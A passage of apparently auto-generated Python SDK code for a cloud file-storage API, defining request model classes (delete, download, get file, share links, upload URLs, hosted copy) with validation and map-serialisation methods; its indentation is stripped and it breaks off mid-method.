def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('description') is not None:
self.description = m.get('description')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('expiration') is not None:
self.expiration = m.get('expiration')
if m.get('owner') is not None:
self.owner = m.get('owner')
if m.get('owner_type') is not None:
self.owner_type = m.get('owner_type')
if m.get('permissions') is not None:
self.permissions = m.get('permissions')
if m.get('share_file_id') is not None:
self.share_file_id = m.get('share_file_id')
if m.get('share_file_path') is not None:
self.share_file_path = m.get('share_file_path')
if m.get('share_name') is not None:
self.share_name = m.get('share_name')
self.share_policy = []
if m.get('share_policy') is not None:
for k in m.get('share_policy'):
temp_model = SharePermissionPolicy()
self.share_policy.append(temp_model.from_map(k))
if m.get('status') is not None:
self.status = m.get('status')
return self
class DeleteDriveRequest(TeaModel):
"""
Delete drive request
"""
def __init__(
self,
headers: Dict[str, str] = None,
drive_id: str = None,
):
self.headers = headers
# Drive ID
self.drive_id = drive_id
def validate(self):
self.validate_required(self.drive_id, 'drive_id')
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.drive_id is not None:
result['drive_id'] = self.drive_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
return self
class DeleteFileRequest(TeaModel):
"""
删除文件请求
"""
def __init__(
self,
drive_id: str = None,
file_id: str = None,
file_id_path: str = None,
permanently: bool = None,
share_id: str = None,
):
# drive_id
self.drive_id = drive_id
self.file_id = file_id
self.file_id_path = file_id_path
# permanently
type: false
self.permanently = permanently
self.share_id = share_id
def validate(self):
if self.drive_id is not None:
self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
def to_map(self):
result = dict()
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.file_id is not None:
result['file_id'] = self.file_id
if self.file_id_path is not None:
result['file_id_path'] = self.file_id_path
if self.permanently is not None:
result['permanently'] = self.permanently
if self.share_id is not None:
result['share_id'] = self.share_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('file_id') is not None:
self.file_id = m.get('file_id')
if m.get('file_id_path') is not None:
self.file_id_path = m.get('file_id_path')
if m.get('permanently') is not None:
self.permanently = m.get('permanently')
if m.get('share_id') is not None:
self.share_id = m.get('share_id')
return self
class DeleteFilesRequest(TeaModel):
"""
批量删除文件请求
"""
def __init__(
self,
drive_id: str = None,
file_id_list: List[str] = None,
share_id: str = None,
):
# drive_id
self.drive_id = drive_id
# file_id_list
self.file_id_list = file_id_list
# share_id
self.share_id = share_id
def validate(self):
if self.drive_id is not None:
self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
self.validate_required(self.file_id_list, 'file_id_list')
def to_map(self):
result = dict()
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.file_id_list is not None:
result['file_id_list'] = self.file_id_list
if self.share_id is not None:
result['share_id'] = self.share_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('file_id_list') is not None:
self.file_id_list = m.get('file_id_list')
if m.get('share_id') is not None:
self.share_id = m.get('share_id')
return self
class DeleteShareRequest(TeaModel):
"""
delete share request
"""
def __init__(
self,
headers: Dict[str, str] = None,
share_id: str = None,
):
self.headers = headers
# share_id
self.share_id = share_id
def validate(self):
self.validate_required(self.share_id, 'share_id')
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.share_id is not None:
result['share_id'] = self.share_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('share_id') is not None:
self.share_id = m.get('share_id')
return self
class DownloadRequest(TeaModel):
"""
下载文件请求body
"""
def __init__(
self,
drive_id: str = None,
file_id: str = None,
image_thumbnail_process: str = None,
share_id: str = None,
video_thumbnail_process: str = None,
file_id_path: str = None,
location: str = None,
referer: str = None,
sign_token: str = None,
):
# drive id
self.drive_id = drive_id
# file id
self.file_id = file_id
# in: query
image_thumbnail_process
self.image_thumbnail_process = image_thumbnail_process
# share_id, either share_id or drive_id is required
self.share_id = share_id
# video_thumbnail_process
type:string
self.video_thumbnail_process = video_thumbnail_process
self.file_id_path = file_id_path
# location
self.location = location
self.referer = referer
self.sign_token = sign_token
def validate(self):
self.validate_required(self.file_id, 'file_id')
def to_map(self):
result = dict()
if self.drive_id is not None:
result['DriveID'] = self.drive_id
if self.file_id is not None:
result['FileID'] = self.file_id
if self.image_thumbnail_process is not None:
result['ImageThumbnailProcess'] = self.image_thumbnail_process
if self.share_id is not None:
result['ShareID'] = self.share_id
if self.video_thumbnail_process is not None:
result['VideoThumbnailProcess'] = self.video_thumbnail_process
if self.file_id_path is not None:
result['file_id_path'] = self.file_id_path
if self.location is not None:
result['location'] = self.location
if self.referer is not None:
result['referer'] = self.referer
if self.sign_token is not None:
result['sign_token'] = self.sign_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('DriveID') is not None:
self.drive_id = m.get('DriveID')
if m.get('FileID') is not None:
self.file_id = m.get('FileID')
if m.get('ImageThumbnailProcess') is not None:
self.image_thumbnail_process = m.get('ImageThumbnailProcess')
if m.get('ShareID') is not None:
self.share_id = m.get('ShareID')
if m.get('VideoThumbnailProcess') is not None:
self.video_thumbnail_process = m.get('VideoThumbnailProcess')
if m.get('file_id_path') is not None:
self.file_id_path = m.get('file_id_path')
if m.get('location') is not None:
self.location = m.get('location')
if m.get('referer') is not None:
self.referer = m.get('referer')
if m.get('sign_token') is not None:
self.sign_token = m.get('sign_token')
return self
class GetAsyncTaskRequest(TeaModel):
"""
获取异步人去信息
"""
def __init__(
self,
async_task_id: str = None,
):
# async_task_id
type:string
self.async_task_id = async_task_id
def validate(self):
pass
def to_map(self):
result = dict()
if self.async_task_id is not None:
result['async_task_id'] = self.async_task_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('async_task_id') is not None:
self.async_task_id = m.get('async_task_id')
return self
class GetDefaultDriveRequest(TeaModel):
"""
Get default drive request
"""
def __init__(
self,
headers: Dict[str, str] = None,
user_id: str = None,
):
self.headers = headers
# 用户ID
self.user_id = user_id
def validate(self):
pass
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.user_id is not None:
result['user_id'] = self.user_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('user_id') is not None:
self.user_id = m.get('user_id')
return self
class GetDownloadUrlRequest(TeaModel):
"""
获取文件下载地址的请求body
"""
def __init__(
self,
addition_data: dict = None,
drive_id: str = None,
expire_sec: int = None,
file_id: str = None,
file_id_path: str = None,
file_name: str = None,
location: str = None,
referer: str = None,
share_id: str = None,
sign_token: str = None,
):
# addition_data
self.addition_data = addition_data
# drive_id
self.drive_id = drive_id
# expire_sec
self.expire_sec = expire_sec
# file_id
self.file_id = file_id
self.file_id_path = file_id_path
# file_name
self.file_name = file_name
# location
self.location = location
self.referer = referer
# share_id, either share_id or drive_id is required
self.share_id = share_id
self.sign_token = sign_token
def validate(self):
self.validate_required(self.drive_id, 'drive_id')
if self.drive_id is not None:
self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
if self.expire_sec is not None:
self.validate_maximum(self.expire_sec, 'expire_sec', 14400)
self.validate_minimum(self.expire_sec, 'expire_sec', 1)
self.validate_required(self.file_id, 'file_id')
if self.file_id is not None:
self.validate_max_length(self.file_id, 'file_id', 50)
self.validate_pattern(self.file_id, 'file_id', '[a-z0-9.-_]{1,50}')
if self.file_name is not None:
self.validate_max_length(self.file_name, 'file_name', 1024)
def to_map(self):
result = dict()
if self.addition_data is not None:
result['addition_data'] = self.addition_data
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.expire_sec is not None:
result['expire_sec'] = self.expire_sec
if self.file_id is not None:
result['file_id'] = self.file_id
if self.file_id_path is not None:
result['file_id_path'] = self.file_id_path
if self.file_name is not None:
result['file_name'] = self.file_name
if self.location is not None:
result['location'] = self.location
if self.referer is not None:
result['referer'] = self.referer
if self.share_id is not None:
result['share_id'] = self.share_id
if self.sign_token is not None:
result['sign_token'] = self.sign_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('addition_data') is not None:
self.addition_data = m.get('addition_data')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('expire_sec') is not None:
self.expire_sec = m.get('expire_sec')
if m.get('file_id') is not None:
self.file_id = m.get('file_id')
if m.get('file_id_path') is not None:
self.file_id_path = m.get('file_id_path')
if m.get('file_name') is not None:
self.file_name = m.get('file_name')
if m.get('location') is not None:
self.location = m.get('location')
if m.get('referer') is not None:
self.referer = m.get('referer')
if m.get('share_id') is not None:
self.share_id = m.get('share_id')
if m.get('sign_token') is not None:
self.sign_token = m.get('sign_token')
return self
class GetDriveRequest(TeaModel):
"""
Get drive request
"""
def __init__(
self,
headers: Dict[str, str] = None,
drive_id: str = None,
):
self.headers = headers
# Drive ID
self.drive_id = drive_id
def validate(self):
self.validate_required(self.drive_id, 'drive_id')
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.drive_id is not None:
result['drive_id'] = self.drive_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
return self
class GetFileByPathRequest(TeaModel):
"""
根据路径获取 File 接口 body
"""
def __init__(
self,
addition_data: dict = None,
drive_id: str = None,
file_path: str = None,
image_cropping_aspect_ratios: List[str] = None,
image_thumbnail_process: str = None,
image_url_process: str = None,
referer: str = None,
sign_token: str = None,
url_expire_sec: int = None,
video_thumbnail_process: str = None,
):
# addition_data
self.addition_data = addition_data
# drive_id
self.drive_id = drive_id
# file_path
self.file_path = file_path
self.image_cropping_aspect_ratios = image_cropping_aspect_ratios
# image_thumbnail_process
self.image_thumbnail_process = image_thumbnail_process
# image_url_process
self.image_url_process = image_url_process
self.referer = referer
self.sign_token = sign_token
# url_expire_sec
self.url_expire_sec = url_expire_sec
# video_thumbnail_process
type:string
self.video_thumbnail_process = video_thumbnail_process
def validate(self):
self.validate_required(self.drive_id, 'drive_id')
if self.drive_id is not None:
self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
if self.url_expire_sec is not None:
self.validate_maximum(self.url_expire_sec, 'url_expire_sec', 14400)
self.validate_minimum(self.url_expire_sec, 'url_expire_sec', 10)
def to_map(self):
result = dict()
if self.addition_data is not None:
result['addition_data'] = self.addition_data
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.file_path is not None:
result['file_path'] = self.file_path
if self.image_cropping_aspect_ratios is not None:
result['image_cropping_aspect_ratios'] = self.image_cropping_aspect_ratios
if self.image_thumbnail_process is not None:
result['image_thumbnail_process'] = self.image_thumbnail_process
if self.image_url_process is not None:
result['image_url_process'] = self.image_url_process
if self.referer is not None:
result['referer'] = self.referer
if self.sign_token is not None:
result['sign_token'] = self.sign_token
if self.url_expire_sec is not None:
result['url_expire_sec'] = self.url_expire_sec
if self.video_thumbnail_process is not None:
result['video_thumbnail_process'] = self.video_thumbnail_process
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('addition_data') is not None:
self.addition_data = m.get('addition_data')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('file_path') is not None:
self.file_path = m.get('file_path')
if m.get('image_cropping_aspect_ratios') is not None:
self.image_cropping_aspect_ratios = m.get('image_cropping_aspect_ratios')
if m.get('image_thumbnail_process') is not None:
self.image_thumbnail_process = m.get('image_thumbnail_process')
if m.get('image_url_process') is not None:
self.image_url_process = m.get('image_url_process')
if m.get('referer') is not None:
self.referer = m.get('referer')
if m.get('sign_token') is not None:
self.sign_token = m.get('sign_token')
if m.get('url_expire_sec') is not None:
self.url_expire_sec = m.get('url_expire_sec')
if m.get('video_thumbnail_process') is not None:
self.video_thumbnail_process = m.get('video_thumbnail_process')
return self
class GetFileRequest(TeaModel):
"""
获取文件元数据
"""
def __init__(
self,
addition_data: dict = None,
drive_id: str = None,
fields: str = None,
file_id: str = None,
file_id_path: str = None,
image_cropping_aspect_ratios: List[str] = None,
image_thumbnail_process: str = None,
image_url_process: str = None,
location: str = None,
referer: str = None,
share_id: str = None,
sign_token: str = None,
url_expire_sec: int = None,
video_thumbnail_process: str = None,
):
# addition_data
self.addition_data = addition_data
# drive_id
self.drive_id = drive_id
# fields
self.fields = fields
# file_id
self.file_id = file_id
self.file_id_path = file_id_path
self.image_cropping_aspect_ratios = image_cropping_aspect_ratios
# image_thumbnail_process
self.image_thumbnail_process = image_thumbnail_process
# image_url_process
self.image_url_process = image_url_process
# location
self.location = location
self.referer = referer
# share_id, either share_id or drive_id is required
self.share_id = share_id
self.sign_token = sign_token
# url_expire_sec
self.url_expire_sec = url_expire_sec
# video_thumbnail_process
type:string
self.video_thumbnail_process = video_thumbnail_process
def validate(self):
self.validate_required(self.drive_id, 'drive_id')
if self.drive_id is not None:
self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
self.validate_required(self.file_id, 'file_id')
if self.file_id is not None:
self.validate_max_length(self.file_id, 'file_id', 50)
self.validate_pattern(self.file_id, 'file_id', '[a-z0-9.-_]{1,50}')
if self.url_expire_sec is not None:
self.validate_maximum(self.url_expire_sec, 'url_expire_sec', 14400)
self.validate_minimum(self.url_expire_sec, 'url_expire_sec', 10)
def to_map(self):
result = dict()
if self.addition_data is not None:
result['addition_data'] = self.addition_data
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.fields is not None:
result['fields'] = self.fields
if self.file_id is not None:
result['file_id'] = self.file_id
if self.file_id_path is not None:
result['file_id_path'] = self.file_id_path
if self.image_cropping_aspect_ratios is not None:
result['image_cropping_aspect_ratios'] = self.image_cropping_aspect_ratios
if self.image_thumbnail_process is not None:
result['image_thumbnail_process'] = self.image_thumbnail_process
if self.image_url_process is not None:
result['image_url_process'] = self.image_url_process
if self.location is not None:
result['location'] = self.location
if self.referer is not None:
result['referer'] = self.referer
if self.share_id is not None:
result['share_id'] = self.share_id
if self.sign_token is not None:
result['sign_token'] = self.sign_token
if self.url_expire_sec is not None:
result['url_expire_sec'] = self.url_expire_sec
if self.video_thumbnail_process is not None:
result['video_thumbnail_process'] = self.video_thumbnail_process
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('addition_data') is not None:
self.addition_data = m.get('addition_data')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('fields') is not None:
self.fields = m.get('fields')
if m.get('file_id') is not None:
self.file_id = m.get('file_id')
if m.get('file_id_path') is not None:
self.file_id_path = m.get('file_id_path')
if m.get('image_cropping_aspect_ratios') is not None:
self.image_cropping_aspect_ratios = m.get('image_cropping_aspect_ratios')
if m.get('image_thumbnail_process') is not None:
self.image_thumbnail_process = m.get('image_thumbnail_process')
if m.get('image_url_process') is not None:
self.image_url_process = m.get('image_url_process')
if m.get('location') is not None:
self.location = m.get('location')
if m.get('referer') is not None:
self.referer = m.get('referer')
if m.get('share_id') is not None:
self.share_id = m.get('share_id')
if m.get('sign_token') is not None:
self.sign_token = m.get('sign_token')
if m.get('url_expire_sec') is not None:
self.url_expire_sec = m.get('url_expire_sec')
if m.get('video_thumbnail_process') is not None:
self.video_thumbnail_process = m.get('video_thumbnail_process')
return self
class GetLastCursorRequest(TeaModel):
"""
获取最新游标
"""
def __init__(
self,
drive_id: str = None,
):
# drive_id
self.drive_id = drive_id
def validate(self):
self.validate_required(self.drive_id, 'drive_id')
if self.drive_id is not None:
self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
def to_map(self):
result = dict()
if self.drive_id is not None:
result['drive_id'] = self.drive_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
return self
class GetMediaPlayURLRequest(TeaModel):
"""
get_media_play_url request
"""
def __init__(
self,
drive_id: str = None,
file_id: str = None,
):
# drive_id
self.drive_id = drive_id
# file_id
self.file_id = file_id
def validate(self):
self.validate_required(self.drive_id, 'drive_id')
if self.drive_id is not None:
self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
self.validate_required(self.file_id, 'file_id')
if self.file_id is not None:
self.validate_max_length(self.file_id, 'file_id', 50)
self.validate_pattern(self.file_id, 'file_id', '[a-z0-9.-_]{1,50}')
def to_map(self):
result = dict()
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.file_id is not None:
result['file_id'] = self.file_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('file_id') is not None:
self.file_id = m.get('file_id')
return self
class GetOfficeEditUrlRequest(TeaModel):
"""
获取office文档在线编辑地址
"""
def __init__(
self,
addition_data: dict = None,
drive_id: str = None,
file_id: str = None,
):
# addition_data
self.addition_data = addition_data
# drive_id
self.drive_id = drive_id
# file_id
self.file_id = file_id
def validate(self):
self.validate_required(self.drive_id, 'drive_id')
if self.drive_id is not None:
self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
self.validate_required(self.file_id, 'file_id')
if self.file_id is not None:
self.validate_max_length(self.file_id, 'file_id', 50)
self.validate_pattern(self.file_id, 'file_id', '[a-z0-9.-_]{1,50}')
def to_map(self):
result = dict()
if self.addition_data is not None:
result['addition_data'] = self.addition_data
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.file_id is not None:
result['file_id'] = self.file_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('addition_data') is not None:
self.addition_data = m.get('addition_data')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('file_id') is not None:
self.file_id = m.get('file_id')
return self
class GetOfficePreviewUrlRequest(TeaModel):
"""
获取office文档预览地址
"""
def __init__(
self,
addition_data: dict = None,
drive_id: str = None,
file_id: str = None,
share_id: str = None,
):
# addition_data
self.addition_data = addition_data
# drive_id
self.drive_id = drive_id
# file_id
self.file_id = file_id
# share_id, either share_id or drive_id is required
self.share_id = share_id
def validate(self):
self.validate_required(self.drive_id, 'drive_id')
if self.drive_id is not None:
self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
self.validate_required(self.file_id, 'file_id')
if self.file_id is not None:
self.validate_max_length(self.file_id, 'file_id', 50)
self.validate_pattern(self.file_id, 'file_id', '[a-z0-9.-_]{1,50}')
def to_map(self):
result = dict()
if self.addition_data is not None:
result['addition_data'] = self.addition_data
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.file_id is not None:
result['file_id'] = self.file_id
if self.share_id is not None:
result['share_id'] = self.share_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('addition_data') is not None:
self.addition_data = m.get('addition_data')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('file_id') is not None:
self.file_id = m.get('file_id')
if m.get('share_id') is not None:
self.share_id = m.get('share_id')
return self
class GetShareLinkByAnonymousRequest(TeaModel):
"""
get_share_link_by_anonymous request
"""
def __init__(
self,
share_id: str = None,
):
# share_id
self.share_id = share_id
def validate(self):
pass
def to_map(self):
result = dict()
if self.share_id is not None:
result['share_id'] = self.share_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('share_id') is not None:
self.share_id = m.get('share_id')
return self
class GetShareLinkIDRequest(TeaModel):
"""
get_share_id request
"""
def __init__(
self,
share_msg: str = None,
):
# share_msg
self.share_msg = share_msg
def validate(self):
pass
def to_map(self):
result = dict()
if self.share_msg is not None:
result['share_msg'] = self.share_msg
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('share_msg') is not None:
self.share_msg = m.get('share_msg')
return self
class GetShareLinkTokenRequest(TeaModel):
"""
get_share_token request
"""
def __init__(
self,
share_id: str = None,
share_pwd: str = None,
):
# share_id
self.share_id = share_id
# share_pwd
self.share_pwd = share_pwd
def validate(self):
pass
def to_map(self):
result = dict()
if self.share_id is not None:
result['share_id'] = self.share_id
if self.share_pwd is not None:
result['share_pwd'] = self.share_pwd
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('share_id') is not None:
self.share_id = m.get('share_id')
if m.get('share_pwd') is not None:
self.share_pwd = m.get('share_pwd')
return self
class GetShareRequest(TeaModel):
"""
get share request
"""
def __init__(
self,
headers: Dict[str, str] = None,
share_id: str = None,
):
self.headers = headers
# share_id
self.share_id = share_id
def validate(self):
pass
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.share_id is not None:
result['share_id'] = self.share_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('share_id') is not None:
self.share_id = m.get('share_id')
return self
class GetUploadUrlRequest(TeaModel):
"""
获取文件上传URL
"""
def __init__(
self,
content_md_5: str = None,
drive_id: str = None,
file_id: str = None,
part_info_list: List[UploadPartInfo] = None,
share_id: str = None,
upload_id: str = None,
):
# content_md5
self.content_md_5 = content_md_5
# drive_id
self.drive_id = drive_id
# file_id
self.file_id = file_id
# upload_part_list
self.part_info_list = part_info_list
self.share_id = share_id
# upload_id
self.upload_id = upload_id
def validate(self):
if self.content_md_5 is not None:
self.validate_max_length(self.content_md_5, 'content_md_5', 32)
if self.drive_id is not None:
self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
self.validate_required(self.file_id, 'file_id')
if self.file_id is not None:
self.validate_max_length(self.file_id, 'file_id', 50)
self.validate_pattern(self.file_id, 'file_id', '[a-z0-9]{1,50}')
if self.part_info_list:
for k in self.part_info_list:
if k:
k.validate()
self.validate_required(self.upload_id, 'upload_id')
def to_map(self):
result = dict()
if self.content_md_5 is not None:
result['content_md5'] = self.content_md_5
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.file_id is not None:
result['file_id'] = self.file_id
result['part_info_list'] = []
if self.part_info_list is not None:
for k in self.part_info_list:
result['part_info_list'].append(k.to_map() if k else None)
if self.share_id is not None:
result['share_id'] = self.share_id
if self.upload_id is not None:
result['upload_id'] = self.upload_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('content_md5') is not None:
self.content_md_5 = m.get('content_md5')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('file_id') is not None:
self.file_id = m.get('file_id')
self.part_info_list = []
if m.get('part_info_list') is not None:
for k in m.get('part_info_list'):
temp_model = UploadPartInfo()
self.part_info_list.append(temp_model.from_map(k))
if m.get('share_id') is not None:
self.share_id = m.get('share_id')
if m.get('upload_id') is not None:
self.upload_id = m.get('upload_id')
return self
class GetVideoPreviewSpriteURLRequest(TeaModel):
"""
获取视频雪碧图地址的请求body
"""
def __init__(
self,
drive_id: str = None,
expire_sec: int = None,
file_id: str = None,
share_id: str = None,
):
# drive_id
self.drive_id = drive_id
# expire_sec
self.expire_sec = expire_sec
# file_id
self.file_id = file_id
# share_id, either share_id or drive_id is required
self.share_id = share_id
def validate(self):
self.validate_required(self.drive_id, 'drive_id')
if self.drive_id is not None:
self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
if self.expire_sec is not None:
self.validate_maximum(self.expire_sec, 'expire_sec', 14400)
self.validate_minimum(self.expire_sec, 'expire_sec', 1)
self.validate_required(self.file_id, 'file_id')
if self.file_id is not None:
self.validate_max_length(self.file_id, 'file_id', 50)
self.validate_pattern(self.file_id, 'file_id', '[a-z0-9.-_]{1,50}')
def to_map(self):
result = dict()
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.expire_sec is not None:
result['expire_sec'] = self.expire_sec
if self.file_id is not None:
result['file_id'] = self.file_id
if self.share_id is not None:
result['share_id'] = self.share_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('expire_sec') is not None:
self.expire_sec = m.get('expire_sec')
if m.get('file_id') is not None:
self.file_id = m.get('file_id')
if m.get('share_id') is not None:
self.share_id = m.get('share_id')
return self
class GetVideoPreviewURLRequest(TeaModel):
"""
获取视频文件播放地址的请求body
"""
def __init__(
self,
addition_data: dict = None,
audio_template_id: str = None,
drive_id: str = None,
expire_sec: int = None,
file_id: str = None,
share_id: str = None,
template_id: str = None,
):
# addition_data
self.addition_data = addition_data
# audio_template_id
self.audio_template_id = audio_template_id
# drive_id
self.drive_id = drive_id
# expire_sec
self.expire_sec = expire_sec
# file_id
self.file_id = file_id
# share_id, either share_id or drive_id is required
self.share_id = share_id
# template_id
self.template_id = template_id
def validate(self):
self.validate_required(self.drive_id, 'drive_id')
if self.drive_id is not None:
self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
if self.expire_sec is not None:
self.validate_maximum(self.expire_sec, 'expire_sec', 14400)
self.validate_minimum(self.expire_sec, 'expire_sec', 1)
self.validate_required(self.file_id, 'file_id')
if self.file_id is not None:
self.validate_max_length(self.file_id, 'file_id', 50)
self.validate_pattern(self.file_id, 'file_id', '[a-z0-9.-_]{1,50}')
def to_map(self):
result = dict()
if self.addition_data is not None:
result['addition_data'] = self.addition_data
if self.audio_template_id is not None:
result['audio_template_id'] = self.audio_template_id
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.expire_sec is not None:
result['expire_sec'] = self.expire_sec
if self.file_id is not None:
result['file_id'] = self.file_id
if self.share_id is not None:
result['share_id'] = self.share_id
if self.template_id is not None:
result['template_id'] = self.template_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('addition_data') is not None:
self.addition_data = m.get('addition_data')
if m.get('audio_template_id') is not None:
self.audio_template_id = m.get('audio_template_id')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('expire_sec') is not None:
self.expire_sec = m.get('expire_sec')
if m.get('file_id') is not None:
self.file_id = m.get('file_id')
if m.get('share_id') is not None:
self.share_id = m.get('share_id')
if m.get('template_id') is not None:
self.template_id = m.get('template_id')
return self
class HostingCompleteFileRequest(TeaModel):
"""
complete file request
"""
def __init__(
self,
headers: Dict[str, str] = None,
addition_data: dict = None,
drive_id: str = None,
file_path: str = None,
forbid_overwrite: bool = None,
part_info_list: List[UploadPartInfo] = None,
share_id: str = None,
upload_id: str = None,
):
self.headers = headers
# addition_data
self.addition_data = addition_data
# drive_id
self.drive_id = drive_id
self.file_path = file_path
# forbid_overwrite
type: boolean
self.forbid_overwrite = forbid_overwrite
# part_info_list
self.part_info_list = part_info_list
self.share_id = share_id
# upload_id
self.upload_id = upload_id
def validate(self):
if self.drive_id is not None:
self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
if self.part_info_list:
for k in self.part_info_list:
if k:
k.validate()
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.addition_data is not None:
result['addition_data'] = self.addition_data
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.file_path is not None:
result['file_path'] = self.file_path
if self.forbid_overwrite is not None:
result['forbid_overwrite'] = self.forbid_overwrite
result['part_info_list'] = []
if self.part_info_list is not None:
for k in self.part_info_list:
result['part_info_list'].append(k.to_map() if k else None)
if self.share_id is not None:
result['share_id'] = self.share_id
if self.upload_id is not None:
result['upload_id'] = self.upload_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('addition_data') is not None:
self.addition_data = m.get('addition_data')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('file_path') is not None:
self.file_path = m.get('file_path')
if m.get('forbid_overwrite') is not None:
self.forbid_overwrite = m.get('forbid_overwrite')
self.part_info_list = []
if m.get('part_info_list') is not None:
for k in m.get('part_info_list'):
temp_model = UploadPartInfo()
self.part_info_list.append(temp_model.from_map(k))
if m.get('share_id') is not None:
self.share_id = m.get('share_id')
if m.get('upload_id') is not None:
self.upload_id = m.get('upload_id')
return self
class HostingCopyFileRequest(TeaModel):
"""
copy file request
"""
def __init__(
self,
headers: Dict[str, str] = None,
drive_id: str = None,
file_path: str = None,
new_name: str = None,
overwrite: bool = None,
share_id: str = None,
to_drive_id: str = None,
to_parent_file_path: str = None,
to_share_id: str = None,
):
self.headers = headers
# drive_id
self.drive_id = drive_id
# file_path
self.file_path = file_path
# new_name
self.new_name = new_name
# overwrite
type: boolean
self.overwrite = overwrite
# share_id
self.share_id = share_id
# to_drive_id
self.to_drive_id = to_drive_id
# to_parent_file_path
self.to_parent_file_path = to_parent_file_path
# share_id
self.to_share_id = to_share_id
def validate(self):
if self.drive_id is not None:
self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
self.validate_required(self.file_path, 'file_path')
if self.new_name is not None:
self.validate_max_length(self.new_name, 'new_name', 1024)
if self.share_id is not None:
self.validate_pattern(self.share_id, 'share_id', '[0-9a-zA-Z-]+')
if self.to_drive_id is not None:
self.validate_pattern(self.to_drive_id, 'to_drive_id', '[0-9]+')
self.validate_required(self.to_parent_file_path, 'to_parent_file_path')
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.file_path is not None:
result['file_path'] = self.file_path
if self.new_name is not None:
result['new_name'] = self.new_name
if self.overwrite is not None:
result['overwrite'] = self.overwrite
if self.share_id is not None:
result['share_id'] = self.share_id
if self.to_drive_id is not None:
result['to_drive_id'] = self.to_drive_id
if self.to_parent_file_path is not None:
result['to_parent_file_path'] = self.to_parent_file_path
if self.to_share_id is not None:
result['to_share_id'] = self.to_share_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('file_path') is not None:
